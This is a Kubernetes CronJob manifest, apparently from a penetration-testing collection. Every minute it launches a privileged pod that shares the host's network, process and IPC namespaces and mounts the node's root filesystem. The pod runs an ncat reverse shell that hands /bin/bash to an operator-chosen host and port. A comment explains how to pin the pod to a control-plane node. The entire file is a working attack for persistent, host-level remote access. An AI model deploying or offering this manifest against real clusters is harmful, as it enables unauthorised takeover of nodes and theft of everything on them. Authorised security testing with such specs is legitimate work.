apiVersion: batch/v1beta1
kind: CronJob
metadata:
  name: everything-allowed-revshell-cronjob
  labels:
    app: pentest
spec:
  schedule: "*/1 * * * *"
  concurrencyPolicy: Forbid
  jobTemplate:
    spec:
      template:
        spec:
          hostNetwork: true
          hostPID: true
          hostIPC: true
          containers:
          - name: everything-allowed-revshell-cronjob
            image: raesene/ncat
            command: [ "/bin/sh", "-c", "--" ]
            args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ]
            securityContext:
              privileged: true
            volumeMounts:
            - mountPath: /host
              name: noderoot
          #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
          volumes:
          - name: noderoot
            hostPath:
              path: /
          restartPolicy: OnFailure
